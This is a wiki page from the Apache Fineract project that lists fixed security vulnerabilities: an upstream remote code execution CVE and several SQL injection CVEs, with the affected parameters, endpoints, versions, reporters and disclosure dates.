Page tree
Skip to end of metadata
Go to start of metadata

This page lists all security vulnerabilities fixed in released version of Apache Fineract. Each vulnerability is given a security impact rating by the Apache security team - please note that this rating may vary from platform to platform.

Fixed in Apache Fineract 1.3.0

CVE-2016-4977 : Remote code execution vulnerabilities as a result of CVE in an upstream dependency

Critical:  A known vulnerability in spring security upstream dependencies allowed malicious users to trigger remote code execution. Additional details at https://nvd.nist.gov/vuln/detail/CVE-2016-4977

Release branch: The fix is available at https://github.com/apache/fineract/tree/1.3.0

Acknowledgements: We would like to thank Roberto (extranewbugs@gmail.com) for reporting this issue, and the Apache Security team for their assistance.

Reported to security team17 December 2018
FixedFebruary 2019
Update Released27 March 2019
Issue public15 October 2019
Affects0.4.0-incubating, 0.5.0-incubating, 0.6.0-incubating, 1.0.0, 1.1.0, 1.2.0



CVE-2018-11800 and CVE-2018-11801: Apache Fineract SQL Injection Vulnerability

Important: Two SQL Injection vulnerabilities were reported; the first one in a query on the GroupSummaryCounts table, the second on the m_center data table.

Release branch with the fix is available at https://github.com/apache/fineract/tree/1.3.0

Acknowledgements: We would like to thank Niels Heinen from Google for reporting this issue, and the Apache Security team for their assistance.

Reported to security team29 August 2018
FixedDecember 2018 & January 2019
Update Released27 March 2019
Issue public9 May 2019
Affects0.4.0-incubating, 0.5.0-incubating, 0.6.0-incubating, 1.0.0, 1.1.0, 1.2.0



Fixed in Apache Fineract 1.1.0

CVE-2018-1292: Apache Fineract SQL Injection Vulnerability - Injection via reportName parameter

Critical: Within the 'getReportType' method, a hacker could inject SQL to read/update data for which he doesn't have authorization for by way of the 'reportName' parameter. 

Release branch with the fix is available at https://github.com/apache/fineract/tree/1.1.0

Acknowledgements: We would like to thank 圆珠笔 (627963028@qq.com) and Apache Security team for reporting this issue.

Reported to security team23 January 2018
Issue public19 April 2018
Update Released23 March 2018

Affects    

0.4.0-incubating, 0.5.0-incubating, 0.6.0-incubating, 1.0.0

CVE-2018-1291: Apache Fineract SQL Injection Vulnerability - Order by injection via Order Param

Critical: Apache Fineract exposes different REST end points to query domain specific
entities with a Query Parameter 'orderBy' which are appended directly with SQL statements. A hacker/user can inject/draft
the  'orderBy'  query parameter by way of the "order" param  in such a way to to read/update the data for which he doesn't have authorization.

Release branch with the fix is available at https://github.com/apache/fineract/tree/1.1.0

Acknowledgements: We would like to thank 圆珠笔 (627963028@qq.com) and Apache Security team for reporting this issue.

Reported to security team23 January 2018
Issue public19 April 2018
Update Released23 March 2018

Affects    

0.4.0-incubating, 0.5.0-incubating, 0.6.0-incubating, 1.0.0

CVE-2018-1290: Apache Fineract SQL Injection Vulnerability - Single quotation escape caused by two continuous SQL parameters

Critical: Using a single quotation escape with two continuous SQL parameters can cause a SQL injection. This could be done in Methods like retrieveAuditEntries of AuditsApiResource Class

 retrieveCommands of MakercheckersApiResource Class

Release branch with the fix is available at https://github.com/apache/fineract/tree/1.1.0

Acknowledgements: We would like to thank 圆珠笔 (627963028@qq.com) and Apache Security team for reporting this issue.

Reported to security team23 January 2018
Issue public19 April 2018
Update Released23 March 2018

Affects    

0.4.0-incubating, 0.5.0-incubating, 0.6.0-incubating, 1.0.0

CVE-2018-1289: Apache Fineract SQL Injection Vulnerability by orderBy and sortOrder parameters

Critical: Apache Fineract exposes different REST end points to query domain specificentities with a Query Parameter 'orderBy' and 'sortOrder' which

are appended directly with SQL statements. A hacker/user can inject/draft the  'orderBy' and 'sortOrder'  query parameter in such a way to read/update the data for which he doesn't have authorization.

Release branch with the fix is available at https://github.com/apache/fineract/tree/1.1.0

Acknowledgements: We would like to thank 圆珠笔 (627963028@qq.com) and Apache Security team for reporting this issue.

Reported to security team18 January 2018
Issue public19 April 2018
Update Released23 March 2018

Affects    

0.4.0-incubating, 0.5.0-incubating, 0.6.0-incubating, 1.0.0
Fixed in Apache Fineract 1.0.0


CVE-2017-5663: Apache Fineract SQL Injection Vulnerability
Critical: An authenticated user with client/loan/center/staff/group read permissions is able to inject malicious SQL into SELECT queries. The 'sqlSearch' parameter on a number of endpoints is not sanitized and appended directly to the query

List of vulnerable endpoints:
- /staff
- /clients
- /loans
- / centers
- /groups
 

Fix detail: Added logic to sanitize the sqlSearch

Release branch with the fix is available at https://github.com/apache/fineract/tree/1.0.0

Acknowledgements: We would like to thank Alex Ivanov and Apache Security team for reporting this issue.

Reported to security team02 April 2017
Issue public13 December 2017
Update Released01 Jun 2017

Affects    

0.4.0-incubating, 0.5.0-incubating, 0.6.0-incubating
  • No labels